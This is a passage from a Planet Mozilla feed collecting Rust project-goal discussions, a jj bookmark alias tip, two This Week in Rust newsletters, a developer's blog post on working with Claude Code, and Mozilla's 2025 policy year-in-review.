(C) You make Edition.Old code always mean T: Deref<Target: Pointee> and you still allow calls to size_of_val but have them cause post-monomorphization errors if used inappropriately. In Edition.New you use stricter checking.

Options (B) and (C) have the downside that changes to the function body (adding a call to size_of_val, specifically) in the old edition can stop callers from compiling. In the case of Option (B), that breakage is at type-check time, because it can change the where-clauses. In Option (C), the breakage is post-monomorphization.

Option (A) has the disadvantage that it takes longer for the new bounds to roll out.

Given this, (A) seems the preferred path. We discussed options for how to encourage that roll-out. We discussed the idea of a lint that would warn Edition.Old code that its bounds are stronger than needed and suggest rewriting to T: Deref<Target: Pointee> to explicitly disable the stronger Edition.Old default. This lint could be implemented in one of two ways

  • at type-check time, by tracking what parts of the environment are used by the trait solver. This may be feasible in the new trait solver, someone from @rust-lang/types would have to say.
  • at post-mono time, by tracking which functions actually call size_of_val and propagating that information back to callers. You could then compare against the generic bounds declared on the caller.

The former is more useful (knowing what parts of the environment are necessary could be useful for more things, e.g., better caching); the latter may be easier or more precise.

Comment by @nikomatsakis posted on 2025-12-19:

Update to the previous post.

Tyler Mandry pointed me at this thread, where lcnr posted this nice blog post that he wrote detailing more about (C).

Key insights:

  • Because the use of size_of_val would still cause post-mono errors when invoked on types that are not SizeOfVal, you know that adding SizeOfVal into the function's where-clause bounds is not a breaking change, even though adding a where clause is a breaking change more generally.
  • But, to David Wood's point, it does mean that there is a change to Rust's semver rules: adding size_of_val would become a breaking change, where it is not today.

This may well be the best option though, particularly as it allows us to make changes to the defaults across-the-board. A change to Rust's semver rules is not a breaking change in the usual sense. It is a notable shift.

Type System Documentation (rust-lang/rust-project-goals#405)
Progress
Point of contact

Boxy

Champions

types (Boxy)

Task owners

Boxy, lcnr

1 detailed update available.

Comment by @BoxyUwU posted on 2025-12-30:

This month I've written some documentation for how Const Generics is implemented in the compiler. This mostly covers the implementation of the stable functionality as the unstable features are quite in flux right now. These docs can be found here: https://rustc-dev-guide.rust-lang.org/const-generics.html

Unsafe Fields (rust-lang/rust-project-goals#273)
Progress
Point of contact

Jack Wrenn

Champions

compiler (Jack Wrenn), lang (Scott McMurray)

Task owners

Jacob Pratt, Jack Wrenn, Luca Versari

No detailed updates available.

05 Jan 2026 12:00am GMT

Jonathan Almeida: Update jj bookmarks to the latest revision

Got this one from another colleague as well but it seems like most folks use some version of this daily that it might be good to have this built-in.

Before I can jj git push my current bookmark to my remote, I need to update where my (tracked) bookmark is, to the latest change:

@  ptuqwsty git@jonalmeida.com 2026-01-05 16:00:22 451384bf <-- move 'main' here.
  TIL: Update remote bookmark to the latest revision
  xoqwkuvu git@jonalmeida.com 2025-12-30 19:50:51 main git_head() 9ad7ce11
  TIL: Preserve image scale with ImageMagick
~

A quick one-liner jj tug does that for me:

@  ptuqwsty git@jonalmeida.com 2026-01-05 16:03:54 main* 6e7173b4
  TIL: Update remote bookmark to the latest revision
  xoqwkuvu git@jonalmeida.com 2025-12-30 19:50:51 main@origin git_head() 9ad7ce11
  TIL: Preserve image scale with ImageMagick
~

The alias is quite straight-forward:

[aliases]
# Update your bookmarks to your latest rev.
tug = ["bookmark", "move", "--from", "heads(::@ & bookmarks())", "--to", "@"]

05 Jan 2026 12:00am GMT

31 Dec 2025

feedPlanet Mozilla

This Week In Rust: This Week in Rust 632

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @thisweekinrust.bsky.social on Bluesky or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Miscellaneous

Crate of the Week

This week's crate is wgsl-bindgen, a binding generator for WGSL, the WebGPU shading language, to be used with wgpu.

Thanks to Artem Borisovskiy for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization.

If you are a feature implementer and would like your RFC to appear in this list, add a call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Rustup

Let us know if you would like your feature to be tracked as a part of this list.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on Bluesky or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on Bluesky or Mastodon!

Updates from the Rust Project

297 pull requests were merged in the last week

Compiler
Library
Cargo
Rustdoc
Clippy
Rust-Analyzer
Rust Compiler Performance Triage

Not a lot of changes this week. Overall result is positive, largely thanks to #142881, which makes computing an expensive data structure for JumpThreading MIR optimization lazy.

Triage done by @panstromek. Revision range: e1212ea7..112a2742

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
0.5% [0.1%, 1.7%] 11
Regressions ❌
(secondary)
0.2% [0.1%, 0.5%] 6
Improvements ✅
(primary)
-0.5% [-1.3%, -0.1%] 74
Improvements ✅
(secondary)
-0.6% [-1.8%, -0.2%] 71
All ❌✅ (primary) -0.4% [-1.3%, 1.7%] 85

2 Regressions, 0 Improvements, 3 Mixed; 1 of them in rollups 37 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week: * No RFCs were approved this week.

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

Compiler Team (MCPs only)

No Items entered Final Comment Period this week for Cargo, Rust, Rust RFCs, Leadership Council, Language Team, Language Reference or Unsafe Code Guidelines.

Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.

New and Updated RFCs
Tracking Issues & PRs
New and Updated RFCs

Upcoming Events

Rusty Events between 2025-12-31 - 2026-01-28 🦀

Virtual
Asia
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

what even is time?!?

- Ralf Jung on his blog

Thanks to llogiq for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by:

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

31 Dec 2025 5:00am GMT

24 Dec 2025

feedPlanet Mozilla

This Week In Rust: This Week in Rust 631

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @thisweekinrust.bsky.social on Bluesky or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is arcshift, an Arc replacement for read-heavy workloads that supports lock-free atomic replacement.

Thanks to rustkins for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization.

If you are a feature implementer and would like your RFC to appear in this list, add a call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Let us know if you would like your feature to be tracked as a part of this list.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

No Calls for participation were submitted this week.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on Bluesky or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on Bluesky or Mastodon!

Updates from the Rust Project

475 pull requests were merged in the last week

Compiler
Library
Rustdoc
Clippy
Rust-Analyzer
Rust Compiler Performance Triage

Very quiet week, with essentially no change in performance.

Triage done by @simulacrum. Revision range: 21ff67df..e1212ea7

1 Regression, 1 Improvement, 3 Mixed; 2 of them in rollups 36 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week: * No RFCs were approved this week.

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

Rust

Cargo

Compiler Team (MCPs only)

Leadership Council

No Items entered Final Comment Period this week for Rust RFCs, Language Team, Language Reference or Unsafe Code Guidelines.

Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.

New and Updated RFCs

Upcoming Events

Rusty Events between 2025-12-24 - 2026-01-21 🦀

Virtual
Asia
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

they should just rename unsafe to C so people can shut up

- /u/thisismyfavoritename on /r/rust

Thanks to Brian Kung for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by:

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

24 Dec 2025 5:00am GMT

20 Dec 2025

feedPlanet Mozilla

Tarek Ziadé: all the code are belong to claude*

I have been writing code for a long time, long enough to be suspicious of tools that claim to fundamentally change how I work. And yet, here we are.

The latest iterations of Claude Code are genuinely impressive. Not in a flashy demo way, but in the quiet, dangerous way where you suddenly realize you have delegated large parts of your thinking to it. This post is about that experience, how Claude helped me build rustnn, what worked remarkably well, and where I had to consciously pull myself back.

Claude as a serious coding partner

For rustnn, I leaned heavily on Claude Code. The quality of the generated Rust was consistently high. Beyond producing correct syntax, it reasoned about what the code was supposed to do. It was context-aware in a way that made iterative design feel natural. I could ask for refactors, architectural changes, or alternative approaches, and get answers that actually respected the existing codebase and long-running tests.

This mirrors what many developers have been reporting toward the end of 2025. Claude Code's agent-oriented design and large-context reasoning make it particularly strong for repository-wide work: multi-file refactors, non-trivial debugging sessions, and architectural changes that need to fit an existing mental model. Compared to Codex-style systems, which still shine for fast edits and local completions, Claude tends to perform better when the task requires sustained reasoning and understanding of project-wide constraints.

Anthropic's recent Claude releases have reinforced that positioning. Improvements in long-context handling, reasoning depth, and agentic workflows make it easier to treat Claude as something closer to a collaborator than an autocomplete engine.

The turning point for me was when I stopped treating Claude like a chat bot and started treating it like a constrained agent.

That is where CLAUDE.md comes in.

Tuning CLAUDE.md

I stumbled upon an excellent LangChain article on how to turn Claude Code into a domain-specific coding agent.

It clicked immediately. Instead of repeatedly explaining the same constraints, goals, and conventions, I encoded them once. Rust style rules. Project intent. Explicit boundaries. How to react to test failures.

The effect was immediate. Output quality improved, and the amount of back-and-forth dropped significantly. Claude stopped proposing things that were clearly out of scope and started behaving like someone who had actually read and understood the project.

For rustnn, I went one step further and anchored development around WPT conformance tests. That gave both Claude and me a shared, objective target. Tests either pass or they do not. No bikeshedding.

Tweaking CLAUDE.md quickly revealed itself as a never-ending process. There are plenty of articles describing different approaches, and none of them are definitive. The current direction seems to be layering information across multiple files, structuring project documentation so it is optimized for agent consumption while remaining readable for humans, and doing so without duplicating the same knowledge in multiple places.

That balance turns out to be just as important as the model itself.

The slippery slope

There is a trap though, and it is a subtle one.

Once Claude is good enough, you start routing everything through it.

It feels efficient, but it is not free. Each interaction has a cost, and when you are in a tight edit-build-test loop, those costs add up fast. Worse, you start outsourcing mechanical thinking that you should probably still be doing yourself.

I definitely fell into that trap.

Reducing costs

The solution, for me, was to drastically reduce how much I talk to Claude, and to stop using its prompt environment as a catch-all interface to the project.

Claude became an extra terminal. One I open for very specific tasks, then close. It is not a substitute for my own brain, nor for the normal edit-build-test loop.

Reducing the context window is also critical. A concrete example is Python tracebacks. They are verbose, repetitive, and largely machine-generated noise. Sending full tracebacks back to the model is almost always wasteful.

That is why I added a hook to rewrite them on the fly into a compact form.

The idea is simple: keep the signal, drop the boilerplate. Same information, far fewer tokens. In practice, this not only lowers costs, it often produces better answers because the model is no longer drowning in irrelevant frames and runtime noise. On Python-heavy codebases, this change alone reduced my usage costs by roughly 20%.

Pre-compacting inputs turned out to be one of the most effective cost-control strategies I have found so far, especially when combined with a more deliberate, intentional way of interacting with the model.

Memory across sessions actually matters

Another pain point is session amnesia. You carefully explain design decisions, trade-offs, and long-term goals, only to repeat them again tomorrow.

A well-crafted CLAUDE.md mitigates part of this problem. It works well for static knowledge: coding style, project constraints, architectural boundaries, and things that rarely change. It gives Claude a stable baseline and avoids a lot of repetitive explanations.

But it does not capture evolving context.

It does not remember why a specific workaround exists, which approach you rejected last week, or what subtle behavior a particular test exposed yesterday. As soon as the session ends, that knowledge is gone, and you are back to re-teaching the same mental model.

This is where cross-session, cross-project memory becomes interesting.

I am currently experimenting with claude-mem

The idea is simple but powerful: maintain a centralized, persistent memory that is automatically updated based on interactions. Instead of manually curating context, relevant facts, decisions, and preferences are summarized and carried forward. Over time, this builds a lightweight but durable understanding of how you work and how your projects evolve.

Compared to CLAUDE.md, this kind of memory is dynamic rather than declarative. It captures intent, not just rules. It also scales across projects, which matters when you jump between repositories that share design philosophy, tooling, or constraints.

It is still early, and it is not magic. You need to be careful about what gets remembered and how summaries are formed. But the direction feels right. Persistent memory reduces cognitive reset costs, shortens warm-up time, and makes the interaction feel less like starting over and more like continuing a conversation you paused yesterday.

That difference adds up.

Final thoughts

Claude Code is good. Very good. Good enough that you need discipline to use it well.

With a tuned CLAUDE.md, clear test-driven goals like WPT conformance, and some tooling to reduce noise and cost, it becomes a powerful accelerator. Without that discipline, it is easy to overuse it and slowly burn budget on things you already know how to do.

I do not think this replaces engineering skill. If anything, it amplifies both good and bad habits. The trick is to make sure it is amplifying the right ones.

References

*The title is a deliberate reference to "All your base are belong to us." The grammar is broken on purpose. It is a joke, but also a reminder that when tools like Claude get this good, it is easy to give them more control than you intended

20 Dec 2025 12:00am GMT

19 Dec 2025

feedPlanet Mozilla

Mozilla Privacy Blog: Behind the Manifesto: Moments that Mattered in our Fight for the Open Web (2025)

Welcome to the blog series "Behind the Manifesto," where we unpack core issues that are critical to Mozilla's mission. The Mozilla Manifesto represents our commitment to advancing an open, global internet that gives people meaningful choice in their online experiences, promotes transparency and innovation and protects the public interest over private walled gardens. This blog series digs deeper on our vision for the web and the people who use it and how these goals are advanced in policymaking and technology.

In 2025, global tech policy raced to keep up with technological change and opportunity. In the midst of this evolution, Mozilla sought to ensure that solutions remained centered on openness, competition and user agency.

From AI Agents and the future of the open web to watershed antitrust cases, competition debates surged. Efforts to drive leadership and innovation in AI led governments across the globe to evaluate priorities. Perennial privacy and security questions remained on the radar, with US states intensifying efforts to pass laws and the EU working to streamline rules on AI, cybersecurity and data. Debates amongst industry, civil society and policymakers reflected the intensity of these moments.

Just as we have for over 20 years, Mozilla showed up to build, convene, debate and advocate. It's clear that more than ever, there must be urgency to truly put people first. Below are a selection of some key moments we're reflecting on, as we head into 2026.

FEBRUARY 2025

Mozilla Participates in Paris AI Action Summit as Part of the Steering Committee

Mozilla participated in the Paris AI Action Summit as Part of the Steering Committee with an 'action packed' schedule that included appearances on panels, a live recording of the podcast "Computer Says Maybe" and a reception to reflect on discussions and thank all the officials and researchers who had worked so hard to make the Summit a success.

Additionally, Mozilla and other partners, including Hugging Face, Microsoft and OpenAI, launched Robust Open Online Safety Tools (ROOST) at the Paris AI Action Summit. The entity is designed to create open source foundations for safer and more responsible AI development, ensuring that safety and transparency remain central to innovation.

The launch of ROOST happened at exactly the right time and in the right place. The Paris AI Action Summit provided a global backdrop for launching work that will ultimately help make AI safety a field that everyone can shape and improve.

Mozilla Event: AI & Competition featuring the President of the German Competition Authority
On February 12, we hosted a public event in Berlin on AI & competition, in partnership with German daily newspaper Tagesspiegel. Addressing the real risk of market concentration at various elements of the AI stack, the President of the German competition authority (Bundeskartellamt), Andreas Mundt, delivered a keynote address setting out his analysis of competition in AI and the role of his authority in ensuring contestable markets as technology rapidly evolves.

MARCH 2025

America's AI Action Plan

In March, Mozilla responded to the White House's request for information on AI policy, urging policymakers to ensure that AI remained open, competitive and accountable. The comments also warned that concentrated control by a few tech giants threatened innovation and public trust, and called for stronger support of open source AI, public AI infrastructure, transparent energy use and workforce development. Mozilla underscored these frameworks are essential to building an AI ecosystem that serves the public interest rather than purely corporate bottom lines.

Mozilla Mornings: Promoting a privacy-preserving online ads ecosystem

The same month, we also hosted a special edition of Mozilla Mornings focused on the future of online advertising and the role Privacy-Enhancing Technologies (PETs) can play in reshaping it. The conversation came at a critical moment in Europe, amidst discussions on updating privacy legislation while enforcing existing rules.

The session brought together policymakers, technologists, and civil-society experts to examine how Europe can move toward a fairer and more privacy-respecting advertising ecosystem. Speakers explored the limitations of today's surveillance-driven model and outlined how PETs and Privacy-Preserving Technologies (PPTs) could offer a viable alternative that protects users while sustaining the economic foundations of the open web. The event underscored Mozilla's commitment to advancing privacy-respecting technologies and ensuring that both policy and technical design converge toward a healthier online advertising ecosystem.

MAY 2025

CPDP: The Evolution of PETs in Digital Ads

At the Brussels 2025 International CPDP Conference, Mozilla organized and participated in a panel titled "The Evolution of PETs in Digital Ads: Genuine Privacy Innovation or Market Power Play?" The discussion explored how Privacy-Enhancing Technologies (PETs) - tools designed to minimize data collection and protect user privacy - are reshaping the digital advertising landscape. Panelists debated how to encourage genuine privacy innovation without reinforcing existing power structures, and how regulations like the GDPR and the Digital Markets Act (DMA) can help ensure PETs foster transparency and competition.

Competition in Focus: U.S. vs Google

The U.S. v. Google remedies trial was a defining moment - not just for 2025, but for the future of browser and search competition. While the remedies phase was about creating competition in the search market, some of the proposed remedies risked weakening independent browsers like Firefox, the very players that make real choice possible.

In early May, Mozilla's CFO, Eric Muhlheim, testified to this very point. Muhlheim's testimony, and Mozilla's amicus brief in the case, spoke to the vital role of small, independent browsers in driving competition and innovation across the web and warned about the risks of harming their ability to select the search default that best serves their users. Ensuring a competitive search ecosystem while avoiding harm to browser competition remains an important issue in 2026.

JUNE 2025

Open by Design: How Nations Can Compete in the Age of AI

The choices governments make today, about who gets to build, access and benefit from AI, will shape economic competitiveness, national security and digital rights for decades. In June, Mozilla supported a new report by the UK think tank Demos, exploring how and why embracing openness in key AI resources can spur innovation and adoption. Enabling safer, more transparent development and boosting digital sovereignty is a recipe, if there ever was one, for 'winning' at AI.

EU Digital Summit: Advocating for Open and Secure Digital Ecosystems

Digital competitiveness depends on open, secure, and interoperable ecosystems that foster innovation while respecting users' rights. We spoke at the 2025 European Digital Summit-a flagship forum bringing together policymakers, regulators, industry leaders, and civil society-and argued that openness and security reinforce each other, that smart regulation has the potential to lower entry barriers and curb gatekeeping power, and that innovation does not require sacrificing privacy when incentives are aligned toward rights-respecting designs. The takeaway was clear: enforcing interoperability, safeguarding pro-competition rules, and embedding privacy-by-design incentives are essential to a resilient, innovative, and trustworthy open web.

JULY 2025

Joint Letter to the UK Secretary of State on DMCCA

When choice disappears, innovation stalls. In July, Mozilla sent an open letter to UK Ministers and the Competition & Markets Authority to urge faster implementation of the UK Digital Markets, Competition & Consumers Act (DMCCA). As an organisation that exists to create an internet that is open and accessible to all, Mozilla has long supported competitive digital markets. Since the EU Digital Markets Act took effect in 2024, users have begun to benefit from genuine choice for the first time, with interventions like browser choice screens offering people browser choice. The result? People are choosing independent alternatives to gatekeepers defaults: Firefox daily active users on iOS rose by 150% across the EU. The UK's DMCCA could be similarly revolutionary for UK consumers and the many challenger businesses taking on market dominance.

SEPTEMBER 2025

Digital Bootcamp: Bringing Internet Architecture to the Heart of EU Policymaking

In September, Mozilla officially launched its Digital Bootcamp initiative, developed in partnership with Cloudflare, Proton and CENTR, to strengthen policymakers' understanding of how the internet actually works and why this technical foundation is essential for effective regulation. We delivered interactive sessions across EU institutions, including a workshop for Members of the European Parliament, the European Commission, and representatives of the EU member states.

Across these workshops, we demystified the layered architecture of the internet, explained how a single website request moves through the stack, and clarified which regulatory obligations apply at each layer. By bridging the gap between engineering and policymaking, Digital Bootcamp is helping ensure EU digital laws remain grounded in technical reality, supporting evidence-based decisions that protect innovation, security and the long-term health of the open web.

OCTOBER 2025

Mozilla Meetup: The Future of Competition

On October 8, Mozilla hosted a Meetup on Competition in Washington, D.C., bringing together leading voices in tech policy - including Alissa Cooper (Knight-Georgetown Institute), Amba Kak (AI Now Institute), Luke Hogg (Foundation for American Innovation) and Kush Amlani (Mozilla) - to discuss the future of browser competition, antitrust enforcement and AI's growing influence on the digital landscape. Moderated by Bloomberg's Leah Nylen, the event reinforced our ongoing efforts to establish a more open and competitive internet, highlighting how policy decisions in these areas directly shape user choice, innovation, and the long-term health of the open web.

Global Encryption Day

On October 21, Mozilla marked Global Encryption Day by reaffirming our commitment to strong encryption as a cornerstone of online privacy, security, and trust. For years, Mozilla has played an active role in shaping the broader policy debate on encryption by consistently pushing back against efforts to weaken it and working with partners around the world to safeguard the technology that helps to keep people secure online - from joining the Global Encryption Coalition Steering Committee, to challenging U.S. legislation like the EARN IT Act and leading multi-year efforts in the EU to address encryption risks in the eIDAS Regulation.

California's Opt Me Out Act: A Continuation of the Fight For Privacy

The passage of California's Opt Me Out Act (AB 566) marked a major step forward in Mozilla's ongoing effort to strengthen digital privacy and give users control of their personal data. For years, Mozilla has spoken in support of Global Privacy Control (GPC) - a tool already integrated into Firefox - as a model for privacy-by-design solutions that can be both effective and user-friendly.

NOVEMBER 2025

Mozilla Submits Recommendations on the Digital Fairness Act

In November, Mozilla submitted its response to the European Commission's consultation on the Digital Fairness Act (DFA), framing it as a key opportunity to modernise consumer protection for AI-driven and highly personalised digital services. Mozilla argued that effective safeguards must tackle both interface design and underlying system choices, prohibit harmful design practices, and set clear fairness standards for personalization and advertising. A well-designed DFA can complement existing EU laws, strengthen user autonomy, provide legal certainty for innovators, and support a more competitive digital ecosystem built on genuine user choice.

Mozilla hosts AI breakfast in UK Parliament

Mozilla President, Mark Surman, hosted MPs and Peers for a breakfast in Parliament to discuss how policymakers can nurture AI that supports public good. As AI policy moves from principle to implementation, the breakfast offered insight into the models, trade-offs and opportunities that will define the next phase of the UK's AI strategy.

DECEMBER 2025

Mozilla Joins Tech Leaders at US House AI Caucus Briefing

Internet Works, an association of "Middle Tech" companies, organized a briefing with the Congressional AI Caucus. The goal was to provide members of congress and their staff a better understanding of the Middle Tech ecosystem and how smaller companies are adopting and scaling AI technologies. Mozilla spoke on the panel, lending valued technical expertise and setting out how we're thinking about keeping the web open for innovation, competition and user choice with this new technology stack.

eIDAS2 Regulation: Defending Web Security and Trust

In December, the EU published the final implementing rules for eIDAS2, closing a multi-year fight over proposals that would have required browsers to automatically trust government-mandated website certificates-putting encryption, user trust, and the open web at risk. Through sustained advocacy and deep technical engagement, Mozilla helped secure clear legal safeguards preserving independent browser root programs and strong TLS security. We also ensured that the final standards respect existing security norms and reflect how the web actually works. With all rules now published, users can continue to rely on browsers to verify websites independently with strict security requirements, governments are prevented from weakening web encryption by default, and a dangerous global precedent for state-controlled trust on the internet has been avoided.

This blog is part of a larger series. Be sure to follow Jenn Taylor Hodges on LinkedIn for further insights into Mozilla's policy priorities.

The post Behind the Manifesto: Moments that Mattered in our Fight for the Open Web (2025) appeared first on Open Policy & Advocacy.

19 Dec 2025 3:23pm GMT